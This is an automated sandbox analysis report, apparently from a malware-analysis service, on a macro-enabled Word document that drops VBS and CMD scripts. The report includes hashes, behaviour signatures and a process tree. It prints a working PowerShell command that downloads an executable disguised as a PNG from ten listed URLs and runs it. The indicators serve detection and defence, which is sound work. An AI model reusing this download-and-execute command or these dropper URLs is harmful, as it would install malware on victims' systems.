Overview

overview

10

Static

static

8

08142020_1...3.docm

windows7_x64

10

08142020_1...3.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    81s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    08142020_1955816493.docm

  • Size

    381KB

  • MD5

    8b9a76bee8f32292b25d55383c100d2c

  • SHA1

    fe63d6a4046682dabce9cc6e49bc22fbbb8399e4

  • SHA256

    a1ea10b25a1dd9165910a6859847f4bc6437f06e4651f8cc31ddf3b9d50be3c2

  • SHA512

    9fc9740134ec8bd07b7f18ce2ab4b52136ebce65ed7d5a62493efceb545ba2a1aedd2217360f933f386716ccb5554a0700aef17949b724e7e301ab6cdaa22d15

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rijschoolfastandserious.nl/rprmloaw/111111.png
exe.dropper

http://nanfeiqiaowang.com/tsxwe/111111.png
exe.dropper

http://forum.insteon.com/suowb/111111.png
exe.dropper

http://webtest.pp.ua/yksrpucvx/111111.png
exe.dropper

http://quoraforum.com/btmlxjxmyxb/111111.png
exe.dropper

http://quickinsolutions.com/wfqggeott/111111.png
exe.dropper

http://bronco.is/pdniovzkgwwt/111111.png
exe.dropper

http://studiomascellaro.it/wnzzsbzbd/111111.png
exe.dropper

http://craniotylla.ch/vzufnt/111111.png
exe.dropper

http://marineworks.eu/dwaunrsamlbq/111111.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 21 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\08142020_1955816493.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1404
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rijschoolfastandserious.nl/rprmloaw/111111.png','http://nanfeiqiaowang.com/tsxwe/111111.png','http://forum.insteon.com/suowb/111111.png','http://webtest.pp.ua/yksrpucvx/111111.png','http://quoraforum.com/btmlxjxmyxb/111111.png','http://quickinsolutions.com/wfqggeott/111111.png','http://bronco.is/pdniovzkgwwt/111111.png','http://studiomascellaro.it/wnzzsbzbd/111111.png','http://craniotylla.ch/vzufnt/111111.png','http://marineworks.eu/dwaunrsamlbq/111111.png')) { try{$path = 'C:\BlotRots\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:980
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:1672

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd
    Filesize

    5KB

    MD5

    2d63e5c7ff61a560f0cc7dccd0661bf6

    SHA1

    995efc69bd84b193786de1a993ad7052f14e9542

    SHA256

    94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584

    SHA512

    94254c0bbbc1c06bc93aeb6264d7d2cdd46ba3ff55fccdc3a669d3d713083a45b9e066a780f5b9684e6b8226c4acaca80df6d61ad5bb1d53c6bb66d9ec2e073c

    Download Submit
  • C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
    Filesize

    68KB

    MD5

    ad7b09adba59218ce485148faf21dc82

    SHA1

    0a3851f903f7d928688e5ebeee13f6d5d921b4de

    SHA256

    214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2

    SHA512

    1fb8361f343e174574eae776fae701580c32dcbb6e120e181190bafb80d5968af788d1edb68f1450d6ddbd62f0bc15d8d9c5bcce6187d712a3afe71c57669f4f

    Download Submit
  • C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs
    Filesize

    2KB

    MD5

    f07e30c22ead3c49606617eb04fbf9c7

    SHA1

    539dbd8cda2c1e6ada7a02e146c33b5aae7b1099

    SHA256

    4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9

    SHA512

    10f721ecf33fe97d074e2b5dd538ff83527a7db3ac4a0cfda183db9c9a2949dc9dd17361eb89e40e4a9865444c721108e1c4b7525337d83ba533250cb6ab052b

    Download Submit
  • memory/960-67-0x0000000000000000-mapping.dmp
    Download
  • memory/980-75-0x00000000027BB000-0x00000000027DA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/980-73-0x000007FEF33B0000-0x000007FEF3F0D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/980-74-0x00000000027B4000-0x00000000027B7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/980-72-0x000007FEF3F10000-0x000007FEF4933000-memory.dmp
    Filesize

    10.1MB

    Download
  • memory/980-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1404-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1404-61-0x000000006ADF1000-0x000000006ADF3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1540-69-0x0000000000000000-mapping.dmp
    Download
  • memory/1584-62-0x000007FEFBC91000-0x000007FEFBC93000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1672-76-0x0000000000000000-mapping.dmp
    Download
  • memory/1772-64-0x0000000000000000-mapping.dmp
    Download
  • memory/1984-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1984-54-0x00000000725F1000-0x00000000725F4000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1984-58-0x000000007105D000-0x0000000071068000-memory.dmp
    Filesize

    44KB

    Download
  • memory/1984-57-0x00000000756E1000-0x00000000756E3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1984-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1984-55-0x0000000070071000-0x0000000070073000-memory.dmp
    Filesize

    8KB

    Download